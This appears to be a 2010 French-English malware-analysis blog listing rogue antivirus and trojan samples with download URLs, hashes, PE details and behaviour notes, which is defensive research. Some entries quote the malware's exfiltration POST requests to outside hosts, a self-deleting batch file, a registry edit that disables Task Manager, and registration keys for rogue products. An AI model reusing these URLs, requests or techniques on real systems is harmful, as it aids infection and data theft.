  • Info additionnel: Change le desktop, autorise seulement quelques processus à s'exécuter, trouve de fausse infections, créé des entrés registres pour démarrer au démarrage.


  • Key for register the rogue: WNDS-S0DF5-GS5E0-FG14S-2DF8G

    Utiliser MBAM pour supprimer le rogue.

  • Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS
    Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS



[Xylibox] Malware notification 2010/06/03 - Security essentials 2010 (Rogue)
  • Localisation: get-money-now.net/cgi-bin/ware.cgi?adv=000000000048170
  • FileName: SetupSE2010.exe
  • File Type : Exe, Size : 1523712 (0174000h) Byte(s)
  • Packer: Unknown
  • EP: 00007ECF
  • EP Offset: 000072CF
  • EP Section: .code
  • Linker: 7.0
  • SHA1: ad620469683947401d56d4c56e4eb44a1e6aed10
  • Info additionnel: Auto Copy in "/%Program Files%\Securityessentials2010" (SE2010.exe)
    Security essentials 2010 displays a lot of warning messages, change the desktop background, detects fake infections and blocks softwares execution. It comes from fake online scanners, malicious porn sites, fake cracks and exploits.


  • Voici un regfile que j'ai fais pour enregistré le rogue:

    REGEDIT4

    [HKEY_CURRENT_USER\Software\SE2010]

    "KEY"="ISR10-F7D9M-P3B2A"
    "MAIL"="phoenixbytes@live.fr"

    [HKEY_LOCAL_MACHINE\SOFTWARE\SE2010]
    "KEY"="ISR10-F7D9M-P3B2A"

    Utiliser MBAM pour supprimer le rogue.

  • Highslide JS Highslide JS Highslide JS



[Xylibox] Malware notification 2010/06/02 - GuardSoft, Ltd: Protection Center (Rogue)
  • Localisation: networkget.com/cgi-bin/153/n002106203r000cX92479924Yde437b93 Z0100f060317P000000070
  • FileName: n002106203r000cX92479924Yde437b93Z0100f060317P000000070.exe
  • File Type : Exe, Size : 90112 (016000h) Byte(s)
  • Packer: Unknown
  • EP: 00001005
  • EP Offset: 00000405
  • EP Section: .text
  • Linker: 9.0
  • SHA1: 311ccf348faec1372196cfe7b5fcdb4f096d1f80
  • Info additionnel: (Désactive le Drag'n'Drop*, suprime des clé registres* (* = secondaire) Bloque l'accès à l'horloge, Créé un exécutable dans /%temp%/ (wscsvc32.exe) et l'exécute, se copie dans /%temp%/ et s'auto delete (pas la copie) un icône apparais dans le systray et fais apparaitre de temps en temps des infobulles pour vous signalez que vous êtes infecté, une fois cliqué sur l'infobulle, "Protection Center" commence à s'installer.


  • FileName: wscsvc32.exe
  • File Type : Exe, Size : 217600 (035200h) Byte(s)
  • Packer: Unknown
  • EP: 00001005
  • EP Offset: 00000405
  • EP Section: .text
  • Linker: 9.0
  • SHA1: 841886825521f6bc5819d6ac8758cbc2c810a6c4
  • Info additionnel: Faux Centre de sécurité Windows qui renvoie sur Protection Center pour vous faire acheté une license.
    Créé une entré registre pour désactivé taskmanager
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system
    DisableTaskMgr =dword:00000001


  • FileName: cntprot.exe
  • File Type : Exe, Size : 1672192 (0198400h) Byte(s)
  • Packer: Unknown
  • EP: 00001005
  • EP Offset: 00000405
  • EP Section: .text
  • Linker: 9.0
  • SHA1: 3a0847129d749f52fa40cafe32477ba926fdf6d1
  • Info additionnel: Rogue, ajoute des objets sur le bureau, trouve des malwares qui n'existe pas dans le but d'effrayer l'utilisateur, programme un reboot au bout de x temps (Compte à rebours de 30 secondes)
    3 Raccourcis pour accéder à des sites pornographiques:
    nudetube.com
    pornotube.com
    youporn.com

    3 Application qui ne font rien:
    spam001.exe
    spam003.exe
    troj000.exe

  • Voici un regfile que j'ai fais pour enregistré le rogue:

    REGEDIT4

    [HKEY_LOCAL_MACHINE\SOFTWARE\Protection Center]

    "License"="94804860143697233939975370329435970097710202"
    "Email"="phoenixbytes@live.fr"

    après être enregistré il delete les fichiers qu'il a créés mais... utiliser MBAM reste la meilleure chose à faire.
    Mes captures d'écran sont assez éloquentes.

  • Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS
    Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS
    Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS
    Highslide JS Highslide JS Highslide JS Highslide JS


  • license.txt:
    Thanks for purchasing antivirus software. Your antivirus software is activated successfully.
    Your registration key is:
    94804860143697233939975370329435970097710202
    (PLEASE, SAVE IT SEPARATELY IN CASE YOU NEED TO REBOOT OR REINSTALL ANTIVIRUS SOFTWARE)
    The last version of antivirus:
    http://edscorpor.com/customers/installer.php?pid=PROTCNT_BASIC

    You can also find this link in your software HELP & SUPPORT part. Please, use this link in case of reinstallation.
    If you have any question, please, pay attention to tickets, Help&Support. You can find out the answer on your question there.
    For urgent cases, please, contact us on the phone
    1-866 427 1693.
    Thank you!




[Xylibox] Malware notification 2010/06/02 - File Name: exe.exe
  • Localisation: winter-smile.com/cgi-bin/get.pl?l=000000000048170
  • Original Name: php.exe
  • File Type : Exe, Size : 90112 (016000h) Byte(s)
  • Packer: Unknown
  • EP: 00001A80
  • EP Offset: 00000E80
  • EP Section: .text
  • Linker: 9.0
  • Info additionnel: Créé une copie dans le dossier temporaire, trojan incomplet ? il y du code pour enregistré un driver mais il ne passe pas dessus.
  • SHA1: adb35d244a4907f43f43e1a282bd38ff509b2f81
  • Highslide JS Highslide JS

[Xylibox] Malware notification 2010/06/02 - File Name: z.exe
  • Localisation: www.vilabonanza.com.br/portal/media/z.exe
  • Original Name: Stub.exe
  • File Type : Exe, Size : 210972 (03381Ch) Byte(s)
  • Packer: Unknown
  • EP: 00001130
  • EP Offset: 00001130
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Créé une copie dans le dossier temporaire, créé une entré registre pour démmarré en même temps que windows, trojan horse
  • SHA1: 603a0a06d571009714fc622d7bc1effabbe00133
  • Highslide JS Highslide JS Highslide JS

[Xylibox] Malware notification 2010/06/02 - Virus Protector (5.1) 1.0.0.36 (Rogue)
    • Localisation: www.zerovir.com/armja3kh6a74vyzmx0.html?get=20ec449778858d30 62592f457c0c4d4f
    • Original Name: Npdsplay.dll
    • File Type : Exe, Size : 1431552 (015D800h) Byte(s)
    • Packer: Unknown
    • EP: 00001000
    • EP Offset: 00000400
    • EP Section: .text
    • Linker: 7.10
    • Info additionnel: Créé des .exe et des .dll dans /system32/ et /driver/ une DLL: HTMLayout.dll et créé dans le dossier temporaire, affiche du faux spam et du faux DDoS pour faire peur a l'utilisateur, navigation bloqué pour quelques sites, bloque l'accès à taskmanager et à regedit
    • SHA1: 9cf882049a82de2f56e6660330a1dd0e330510ad



    • Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS

[Xylibox] Malware notification 2010/06/01 - File Name: .p
  • Localisation: ytu65ewq.3322.org:12/.p
  • Additional info: ça vient de Chine.

    p.exe create:
    TraversinIE.exe
    0504_1[1].exe
    13[1].exe
    extext7995062t.exe

    p.exe (main malware):
  • File Type : Exe, Size : 31013 (07925h) Byte(s)
  • EP: 00001030
  • Packed: Upack 2.x - 3.x Heuristic Mode -> Dwing
  • EP Offset: 00000030
  • Linker: 0.50
  • Section: .Upack
  • SHA-1: C6ECD8899A176573A50B1412BF17EE761E964772
  • ###[UNPACKED]###
  • File Type : Exe, Size : 331776 (051000h) Byte(s)
  • EP: 000030F3
  • EP Offset: 000030F3
  • Linker: 0.50
  • Section: .Upack

  • TraversinIE.exe
  • Original name: uc98.EXE
  • File Type : Exe, Size : 18944 (04A00h) Byte(s)
  • EP: 0000B7F0
  • EP offset: 00003BF0
  • Linker: 6.0
  • Section: UPX1
  • SHA-1: 1CB62358A1E2E96D7D4D3C2C5E7153517EB5F422
  • ###[UNPACKED]###
  • Original filename: uc98.EXE
  • File Type : Exe, Size : 61440 (0F000h) Byte(s)
  • EP: 0000B7F0
  • EP offset: 00003BF0
  • Linker: 6.0
  • Section: UPX1

  • 0504_1[1].exe
  • Packed: UPX 3.03
  • SHA-1: 6D1D11B13B23D33F9A7779895474AA6238A32AD1
  • File Type : Exe, Size : 41984 (0A400h) Byte(s)
  • EP: 000159C0
  • EPOffset: 00009DC0
  • Linker: 6.0
  • Section: UPX1
  • ###[UNPACKED]###
  • File Type : Exe, Size : 102400 (019000h) Byte(s)
  • EP: 00006106
  • EP Offset: 00006106
  • linker: 6.0
  • Section: UPX0

  • 13[1].exe
  • Packed: UPX 3.03
  • SHA-1: E8E118D49086E2AA510229DF8DFEAF22471732FF
  • File Type : Exe, Size : 20992 (05200h) Byte(s)
  • EP: 0000E780
  • EPOffset: 00004B80
  • Linker: 6.0
  • Section: UPX1
  • ###[UNPACKED]###
  • File Type : Exe, Size : 73728 (012000h) Byte(s)
  • EP: 0000248F
  • EP Offset: 0000248F
  • linker: 6.0
  • Section: UPX0

  • extext7995062t.exe
  • Packer: Unknown
  • SHA-1: 80C0CBBE011CF5CC41AE050DC47CD6C60006BF9A
  • File Type : Exe, Size : 12288 (03000h) Byte(s)
  • EP: 0000097C
  • EPOffset: 0000097C
  • Linker: 6.0
  • Section: .text
  • Principe: Désative NOD32 (erkn.exe, egui.exe) et fait d'autres actions avec notepad.exe et cmd.exe, le tous en ShowState = SW_HIDE
    Créé une DLL (tete13015250t.dll), l'exécute avec rundll32.exe
    La dll désactive quelques anti-virus, et ensuite la dll et suprimé

    004034AB . 50 PUSH EAX ; /FileName = "C:\WINDOWS\tete13015250t.dll"
    004034AC . FF15 04104000 CALL DWORD PTR DS:[<&KERNEL32.DeleteFile>; \DeleteFileA

    L'application créé un driver (pcidump.sys) l'enregistre (ADVAPI32.OpenSCManagerA) /démmarre le service/suprime le driver.
    D'autre aplications sont généré comme "TraversinIE.exe"
    Qui vons navigué sur des sites, essayé d'attaqué avec un fichier .dat téléchargé
    (et enregistré dans /system32/AttackSet.dat)
    le fichier .dat contient une liste de site et d'IP

    A la fin, p.exe créé un .bat dans le même dossier que ou il se trouve (afc90a.bat)
    contenu:
    @echo off
    @echo ad32rwhlk>>321.aqq
    @echo ad32rwhlk>>321.aqq
    @echo ad32rwhlk>>321.aqq
    @echo ad32rwhlk>>321.aqq
    @echo ad32rwhlk>>321.aqq
    @echo ad32rwhlk>>321.aqq
    @echo ad32rwhlk>>321.aqq
    @echo ad32rwhlk>>321.aqq
    @echo ad32rwhlk>>321.aqq
    @echo ad32rwhlk>>321.aqq
    @del 321.aqq
    @del "C:\Documents and Settings\Administrateur\Bureau\dumped.exe"
    @del afc90a.bat
    @exit

    et a la fin:
    004030E6 . 6A 00 PUSH 0 ; /ExitCode = 0
    004030E8 . FF15 64104000 CALL DWORD PTR DS:[<&KERNEL32.E>; \ExitProcess

    processus qui tourne en fond:
    TraversinIE.exe (plusieure copie même)
    0504_1[1].exe
    13[1].exe
    extext7995062t.exe

  • Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS
    Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS
    Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS

[Xylibox] Malware notification 2010/05/31 - File Name: agressive.exe [Updated]
  • Localisation: www.paradstars.com/images/agressive.exe
  • Original Name: Unknown
  • File Type : Exe, Size : 159264 (026E20h) Byte(s)
  • Packer: Unknown
  • EP: 00005C47
  • EP Offset: 00004E47
  • EP Section: .data
  • Linker: 8.0
  • Info additionnel: trojan, create a .sys file, use the Service Control Manager for register it, start the service, open cmd and auto destroy the file agressive.exe
  • Highslide JS Highslide JS Highslide JS Highslide JS Highslide JS

  • Update:
    Video

[Xylibox] Malware notification 2010/05/30 - File Name: video.4785.avi.exe
  • Localisation: videohubb.in/mpeg/video.4785.avi.exe
  • Original Name: Unknown
  • File Type : Exe, Size : 101376 (018C00h) Byte(s)
  • Packer: Unknown
  • EP: 00008121
  • EP Offset: 00007721
  • EP Section: .text
  • Linker: 2.11
  • Info additionnel: create new files, send data
  • SHA1: a82978cc5da96967fd89d52847053aa4e016d6e5
    protod.exe:
    http://blueriverarts.com/ramamba-hara-mamba-rum.php
    Parameter Name Value
    e v22MmGezHIyjUzFl61YdHLJrOeDmJ4Q6O41eHyF2exxSCwCA2UWMzTylUVrHIQqMgMqV7MsRLgiBMF4bFG3zf4iRtufQpaX/Nvtqv 7plA==

    http://freesurrealarts.com/logos/625ce14e091ad92707df4b6899314e9c6fb8b42436c12950de2d820a172d1687700ddf8a2ba3a32d7/e4851217d9a/logo.gif

    http://dvdvideoarts.com/werber/f495f2b7e93/217.gif


    http://picturegraffitoarts.com/perce/d24c31dea91a89c7271f0b38a9f16e7cafc8f49456f159402e7da20ae72db6c760fdaf1a0b23e32d3/f465e2f7d95/qwerce.gif
    Note: data are changing everytime you open the exe.

  • rundll32.exe:
    http://cuert.com/oms.php
    POST /oms.php HTTP/1.0
    Host: cuert.com
    User-Agent: XML
    Content-Length: 129
    Content-Type: application/x-www-form-urlencoded
    data=hv7ROK5vhoufT3ysRPtwhSdCPiNb1+ERI3HxgCf1AKQmBpHjUtsTW9XhkpL+0Jnplbyi6nsRfpCeQNe5SY1MWNROxBqZWIbwZFfGpPZRgQZXMdOnVnnp7vE2mg==

  • Ysl.exe:
    http://livingtraffic.com/borders.php (Navigate to a random Ad)
    POST /borders.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
    Host: livingtraffic.com
    Content-Length: 397
    Connection: Keep-Alive
    Cache-Control: no-cache
    data=/CjEfcGBu0aC2aRzshY15Se2ybtC5dpImg/w+Tex1QY4wJ5rq8UzvceeHLjiBkG/g+7VCC/0pBqxOHp7eRcHPiYo99QMUujgUW4boDIVJrfNWKSLnrd6100X8mVNwwq4vOQxSHXwpz9Hm0kz9fBfaUn10x/GLcofRiH4LvFsAiGYFsaioMW07K0E3rkk3MeZUygDeLGw2s12+oPMNrnJZczhzZ8xiNWu5TgOhq4OqUS0BMTdK2bZy/hj22fYPROJBldybEq/4kfeYEcl/ciRQeLEgdooChJv/oVzPhBsvCkqww83oFaArnsLuMFzziWRoD1780koO+1moE1TtNIfizqep68zCkdvTeZIElQ4H99xQXKEQX4bhp4bhaKbKGEJkbdfBT72
  • Original Name: Unknown
  • File Type : Exe, Size : 121344 (01DA00h) Byte(s)
  • Packer: Unknown
  • EP: 00001957
  • EP Offset: 00000D57
  • EP Section: .text
  • Linker: 6.0
  • SHA1: 0a908be22c5e50e813825b0656e1f152fd1f1d1d

  • Ylopea.exe:
    http://idirecttraffic.com/ad_type.php
    Parameter Name Value
    a ULH1WNOYRUPTo7pdPZuneTl26XNd3lSN44zzdNAY1bYu0+q2jVNP4oBMVB0=
  • Original Name: Unknown
  • File Type : Exe, Size : 124928 (01E800h) Byte(s)
  • Packer: Unknown
  • EP: 0000193A
  • EP Offset: 00000D3A
  • EP Section: .text
  • Linker: 6.0
  • SHA1: 1164787b6452fb37c130b22970d55de1e1f3e797

[Xylibox] Malware notification 2010/05/30 - File Name: protod.exe
  • Localisation: 78.140.15.82/protod.exe
  • Original Name: Unknown
  • File Type : Exe, Size : 117760 (01CC00h) Byte(s)
  • Packer: Unknown
  • EP: 00012F68
  • EP Offset: 00012368
  • EP Section: .data
  • Linker: 9.0
  • Info additionnel: trojan, create multiple registry Keys, send data on a site ?

    POST /put_accs.dll HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
    Host: v00d00.org
    Accept: text/html
    Connection: Keep-Alive
    Content-Length: 125
    Content-Type: multipart/form-data; boundary=----------1Qk3GIrIlvvwlKGhmCTAw8

    ------------1Qk3GIrIlvvwlKGhmCTAw8
    Content-Disposition: form-data; name="data"

    ------------1Qk3GIrIlvvwlKGhmCTAw8--

  • SHA1: e99a3cedde43f8a081ff6596906b20089ea4def3

[News] 2010/05/29 - Concours Crack Me ESET

    S'adressant plus particulièrement aux étudiants en informatique, le jeu « Crack Me » est un concours dont l'objectif est d'analyser le code source du programme « ESET_crack-me.exe », afin de trouver 3 messages cachés. Ce concours est à l'origine un test d'entrée soumis aux candidats qui postulent pour le poste de développeur chez l'éditeur d'antivirus ESET.

    Le défi à relever ? Soyez le plus rapide à analyser le code, trouver les failles et le premier à dévoiler les messages cachés !!! Réussissez à déjouer les pièges, décodez l'ultime message et tentez de gagner un voyage à Bratislava en Slovaquie pour découvrir les secrets bien gardés du célèbre laboratoire ESET où est développé l'antivirus NOD32.

     

    Nombreux lots a gagner: Opportunités de Stages et Jobs á la clé chez ESET !
    Concours 100% GAGNANT : 3 mois de protection antivirus offerts à tous les participants

    Séjour à Bratislava et visite en exclusivité du labo ESET*
    Partez à la découverte du laboratoire de recherche anti-malwares du célèbre éditeur antivirus ESET basé en Slovaquie.

    Vous êtes à la recherche d'un job étudiant ? Participez au concours crackme et recevez nos offres par e-mail.

    Concours Crack Me organisé par l'éditeur ESET


[Xylibox] Malware notification 2010/05/018 - File Name: Facebook Hacking By ImadowS.exe
  • Localisation: http://www.youtube.com/watch?v=xH44cH07eQc
  • Original Name: Stub.exe
  • File Type : Exe, Size : 990155 (0F1BCBh) Byte(s)
  • Packer: SFX ZIP Archive
  • EP: 00007481
  • EP Offset: 00007481
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: When runned, make 2 files in: "C:\ProgramFiles" and run the files
    » Facebook Hacking By ImadowS.exe
    - Original Name: Faceboax.exe
    - Packed: X-treme Protector v1.07
    - EP: 0007E21E
    - EP offset: 0007C61E
    - Linker: 8.0
    - EP Section: .text
    - File Type : File Type : Exe, Size : 868352 (0D4000h) Byte(s)

    » server.exe
    - Original Name: Unknown
    - Packed: X-treme Protector v1.07
    - EP: 0000A014
    - EP offset: 00008614
    - Linker: 6.0
    - EP Section: WinLicen
    - File Type : Exe, Size : 990589 (0F1D7Dh) Byte(s)
  • SHA1 (Facebook Hacking By ImadowS.exe): 34291c134e31b1e10f4c819eba3b03838bee64d3
  • SHA1 (Facebook_Hacking_By_ImadowS.exe): 546b094d4d7442301c471da90991c55ab6de9e58
  • SHA1 (server.exe): 389cc6a3081813af1ebfaa7a437777e08a6c3b91
  • Highslide JS

[News] 2010/05/17 - Une menace virtuelle peut-elle ruiner votre existence réelle ?

    Même si l'histoire ne date pas d'aujourd'hui, c'est toujours bon de relayé l'information car ce phénomène reste d'actualité, et c'est aussi pour redonner un peu de dignité à un homme qui n'a rien demandé à personne.

    ETATS-UNIS - Une enquête révèle que des innocents propriétaires d'ordinateurs infectés pourraient être accusés à tort

    «C'est pas moi, c'est un virus.» L'excuse serait couramment employée par les pédophiles pour justifier la présence sur leur disque dur d'images pédopornographiques. Une enquête de l'agence Associated Press révèle cependant que dans un cas au moins, c'est la vérité.


    Michael Fiola en compagnie de son épouse Robin

    le cas de Michael Fiola, renvoyé en 2007 par son employeur, qui avait retrouvé sur son ordinateur des fichiers de pédopornographie.

    Accusé de pédophilie, Michael Fiola risquait 5 ans de prison dans le Massachusetts. Les pneus de sa voiture ont été crevés, il perdu tous ses amis et lui-même a été menacé de mort, mais il a décidé de se défendre.
    Heureusement son épouse s'est tenue prêt de lui, ses avocats ont fait procéder à des expertises qui ont révélé que son ordinateur était infecté.

    «Ca a ruiné ma vie, la vie de ma femme et la vie de ma famille»

    Un virus était programmé pour visiter une quarantaine de sites pédopornographiques par minute.
    De nouveaux tests, réalisés par le procureur, ont confirmé les conclusions de la défense et les charges pesant contre Michael Fiola ont été abandonnées.

    L'affaire a coûté 250.000 dollars (plus de 165.000 euros) à Michael Fiola qui a dû hypothéquer sa maison et vendre sa voiture.
    «Ca a ruiné ma vie, la vie de ma femme et la vie de ma famille», déclare-t-il aujourd'hui.
    Merci a ¥ω₪h (MAD).


[XyliBox] Xylibox Malware Challenge 1# - Get XyliBoxed! [Updated]

    Xylibox Malware Challenge 1#:
    Difficulty: 2 - Needs a little brain (or luck)
    Platform: Windows XP
    Language: VB6 (Voluntarily coded in this language)

    Rules: - Make a tutorial*
    - Code a tool for disinfect your computer (With source)

    I hope to see some innovative solutions!
    Good luck & Have fun!
    Mail: phoenixbytes@live.fr (For Solution Submission)

    After first solutions, I will release the virus source code and your solutions.
    =============================================================
    *The main goal of this challenge is to give newbies a way to learn, so they need correct tutorial.
    Think about this words when writing your tutor.
    Explain what you did.
    And this is not done by writing two lines and commenting some code parts.
    Think about the informations you needed the first time when you were new to reversing..
    Archive password: b0x

    Download



    Horadrim solution: Click here

    packetdeath solution: Click here, Screenshot


    Source code:

    Thanks to everyone who have try this challenge !


[Xylibox] Malware notification 2010/05/04 - File Name: steamkeys.exe
  • Localisation: http://www.youtube.com/watch?v=a4x-Pkn4O8g
  • Original Name: Stub.exe
  • File Type : Exe, Size : 90684 (01623Ch) Byte(s)
  • Packer: Unknown
  • EP: 0001736E
  • EP Offset: 0001576E
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Stealer + Youtube account deleted + gmail account changed
  • SHA1: 7c8024dfa5835507bbe2414d9c0bbea1aff3791e
  • Highslide JS Highslide JS Highslide JS

[News] 2010/04/27 - Stealers: You Click, You Lose.

    Stealers:
    Les PassWord Stealer sont, comme le nom l'indique, des outils destinés à voler les mots de passe.
    Ils font partie d'un vaste ensemble d'outils et de techniques d'attaque des mots de passe.
    Ce sont de petits programmes d'espionnage, spécialiés, constituant une sous-famille des spywares.
    Ils construisent un journal de tous les mots de passe trouvés sur une machine et les mettent à disposition d'une personne ayant physiquement accès à l'ordinateur attaqué ou les envoient, généralement par un e-mail caché, au voleur.

    Vidéo



  • Mw2Keygen3.exe: 48a67db09517d1b3195ac402dc23507a10645079
  • Mw2Keygen2.exe: ac867125725a9e757f9280b46b101fd2dcfca779
  • Highslide JS Highslide JS

[Xylibox] Malware notification 2010/04/22 - File Name: allopass_generator_1.0.exe
  • Localisation: http://www.youtube.com/watch?v=6PnfIlnvIfk
  • Original Name: 72389 binder stub.exe
  • File Type : Exe, Size : 174673 (02AA51h) Byte(s)
  • Packer: Unknown
  • EP: 0000598E
  • EP Offset: 00003D8E
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: binded shit hackhoundserver.exe
  • SHA1: 2df8c6f7b9a2fe3ce93693b8c063a044fcf8f28e

[Xylibox] Malware notification 2010/04/22 - File Name: Steam Acc Hacker.exe
  • Localisation: http://www.youtube.com/watch?v=FfwCOixAmJU
  • Original Name: Unknown
  • File Type : Exe, Size : 536324 (082F04h) Byte(s)
  • Packer: Unknown
  • EP: 0000AB5C
  • EP Offset: 00009F5C
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: Binded shit
  • SHA1: b89d3e2ac7de1e11feee64912018cf21ff6d2f19
  • Highslide JS

[Xylibox] Malware notification 2010/04/22 - File Name: Steam Passwort Hacker.exe
  • Localisation: http://www.youtube.com/watch?v=Txju--XSa7I
  • Original Name: Steam Hack Tool.exe
  • File Type : Exe, Size : 209000 (033068h) Byte(s)
  • Packer: Unknown
  • EP: 0000A37E
  • EP Offset: 0000877E
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: Passwd stealer, was sent to alphalords@gmx.de
  • SHA1: 98c600f4b03436c840ccb5f273f4f1275119eb70

[News] 2010/04/17 - Malware Analyse: IM51332.JPG-www.myspace.com.exe
    Une petite analyse pour que vous puissiez voir un aperçu du travail :)
    L'archive va surement être bloqué par votre Anti-Virus à cause du malware que il y a dedans.
    Pour une raison de sécurité évidente j'ai mis le malware dans un fichier .zip protégé par un mot de passe.
    Le mot de passe et dans la description de l'archive.
    Téléchargé

  • Name: IM51332.JPG-www.myspace.com.exe
  • File Type : Exe, Size : 98958 (01828Eh) Byte(s)
  • Packer: Unknown
  • EP: 00001240
  • EP Offset: 00000640
  • EP Section: .text
  • Linker: 2.56
  • SHA1:14550cd11d0a08b5d1682f6bb588a3450b81074b
  • Highslide JS Highslide JS

[Xylibox] Malware notification 2010/04/14 - File Name: syspck32.exe
  • <nico34_> J'ai un exe sous la main si ça t'interesse.
    <Xylitol> Send.
  • Original Name: v2vapp.exe
  • File Type : Exe, Size : 35840 (08C00h) Byte(s)
  • Packer: Unknown
  • EP: 0000110C
  • EP Offset: 0000050C
  • EP Section: .text
  • Linker: 4.9
  • Info additionnel: Trojan, dropper
    Impossible a debugé (pour moi) suite au crash après la création du thread.

  • SHA1: ad37e72cf428a75d5226532315a294cef7f8c72d
  • Highslide JS Highslide JS

[Xylibox] Malware notification 2010/04/14 - File Name: setup.exe
  • Localisation: http://208.86.61.239:971/325859d15f1bd/
  • Original Name: oXKJVd.exe
  • File Type : Exe, Size : 72704 (011C00h) Byte(s)
  • Packer: Unknown
  • EP: 000010B8
  • EP Offset: 000004B8
  • EP Section: .text
  • Linker: 7.10
  • Info additionnel: Koobface family with fakeAV: antimalware-proz0.com
  • setup.exe: fd406d74b9f5ad0f512ba5179e3b68e14c70e555
  • bill106.exe: fd406d74b9f5ad0f512ba5179e3b68e14c70e555
  • rdr_1271198398.exe: 09EDF610CD87E6A8279CB8821B97C35232B195CE
  • Setup_312s2.exe: 1C95393FBAEB3D41D665FCAEE52D9B07AB8AEA92
  • rdr_1271198009.exe: 9316F5879F43BC43B1513481ED281970AEBC28C82
  • Vidéo

[Xylibox] Malware notification 2010/04/13 - File Name: AssualtCube hack.exe
  • Localisation: http://www.youtube.com/watch?v=YVSdAOaQ3r0
  • Original Name: ¬¬¬¬¬¬lijkjkjDFFNFGDFFFFFHLULZ¬¬¬¬¬¬¬.exe
  • File Type : Exe, Size : 340078 (05306Eh) Byte(s)
  • Packer: Unknown
  • EP: 000012F8
  • EP Offset: 000012F8
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Trojan Horse.
    The file is incl with "AssualtCube hack.dll" the dll is clean, it's a dll for a program called "Black skillz Public" a Warrock hack...
    about AssualtCube hack.exe
    he make a file in "C:\Documents and Settings\Administrateur\Application Data"
    file with a VB icon called "winregsec.exe" this file was also launched by AssualtCube hack.exe
    Solution: Kill the process and destroy the file "winregsec.exe" and "AssualtCube hack.exe"

  • AssualtCube hack.exe: 209d422930c440c92560e43bfa8646c880fd2a21
  • winregsec.exe: d9885c6c127f81df4112559a1407c09818e1153b

[News] 2010/04/13 - W32/TrojanDownloader.FakeAlert.ISecurity2010
    Une petite pensée pour la team MAD

  • 41.exe - 6225a8826df0a8794d4419498a1c8a581946e8fc
  • setup.exe - c0da206aa57be1380e2a138e745a505abc7849af
  • IS2010.exe - 8ce0214b485e9a2c0b1e0ba182b1a31a1cc964ef
  • http://buy-is2010.com/buy/?code=00001222
  • Highslide JS Highslide JS Highslide JS
  • Vidéo


[Xylibox] Malware notification 2010/04/06 - File Name: Windows Loader 7.0.exe
  • Localisation: http://www.youtube.com/watch?v=lKdH7VWUC54
  • Original Name: Loader.exe
  • File Type : Exe, Size : 118784 (01D000h) Byte(s)
  • Packer: Unknown
  • EP: 00001150
  • EP Offset: 00001150
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Trojan Horse, pihbot.exe
  • SHA1:a39e0fc39dcd87ea56312650d74e066122d1b4e9

[Xylibox] Malware notification 2010/04/06 - File Name: KeyGen Senders.Exe
  • Localisation: http://www.youtube.com/watch?v=QbtAhJL12bY
  • Original Name: C:\Documents and Settings\nathu\Desktop\stub - Version 3.0 mini.exe
  • File Type : Exe, Size : 383324 (05D95Ch) Byte(s)
  • Packer: Unknown
  • EP: 0001752E
  • EP Offset: 0001572E
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Virus
  • SHA1: e2bebb71bbaec99d98819fb470cc674b434e6d1f

[Xylibox] Malware notification 2010/04/06 - File Name: MsnPasswordCrack.exe
  • Localisation: http://www.youtube.com/watch?v=74dRo8bwCE8
  • Original Name: MsnPasswordCrack.exe
  • File Type : Exe, Size : 56320 (0DC00h) Byte(s)
  • Packer: Unknown
  • EP: 0000E23E
  • EP Offset: 0000C63E
  • EP Section: .text
  • Linker: 8.0
  • Info additionnel: Social engineering Manipulation, exe Clean
  • SHA1: 5b91338a044c3ce240e75bc7deb0386b9c623b0d
  • Highslide JS Highslide JS

[Xylibox] Malware notification 2010/04/06 - File Name: Half-Life 2 KeyGen.exe
  • Localisation: http://www.youtube.com/watch?v=HDCt4z0z0fg
  • Original Name: HL2.exe
  • File Type : Exe, Size : 737280 (0B4000h) Byte(s)
  • Packer: Unknown
  • EP: 000010B0
  • EP Offset: 000010B0
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Trojan Horse, crypted
  • SHA1: 8a65dfd14998eaaa8addfe9fe47cfeee2ddf104c

[Xylibox] Malware notification 2010/04/05 - File Name: CoD 6 Keygen.exe
  • Localisation: http://www.youtube.com/watch?v=F4xL6qWmUeQ
  • Original Name: COD6Keygen.exe
  • File Type : Exe, Size : 475136 (074000h) Byte(s)
  • Packer: Unknown
  • EP: 000010E4
  • EP Offset: 000010E4
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Trojan Horse
  • SHA1: ae1100b2e3e83c1d78ef9f3b8ef5426a6a97ef75

[Xylibox] Malware notification 2010/04/04 - File Name: Cheat-Crash-Pack.exe
  • Localisation: http://www.youtube.com/watch?v=DrPIgenUB90
  • Original Name: stub.exe
  • File Type : Exe, Size : 593920 (091000h) Byte(s)
  • Packer: Unknown
  • EP: 000010EC
  • EP Offset: 000010EC
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Stealer, crypted
  • SHA1: 9f9c0e754d51989e9126fcdd35b6a4c9a4519332

[Xylibox] Malware notification 2010/04/04 - File Name: Css Public Server Hack.exe
  • Localisation: http://www.youtube.com/watch?v=o4qCrtQnVFs
  • Original Name: stub.exe
  • File Type : Exe, Size : 163840 (028000h) Byte(s)
  • Packer: Unknown
  • EP: 00002604
  • EP Offset: 00002604
  • EP Section: .text
  • Linker: 6.0
  • Info additionnel: Stealer, crypted
  • SHA1: ff5c7bb112fa099ec4ef4708d331ad719787c832

[Xylibox] Malware notification 2010/04/04 - File Name: Sprut.exe
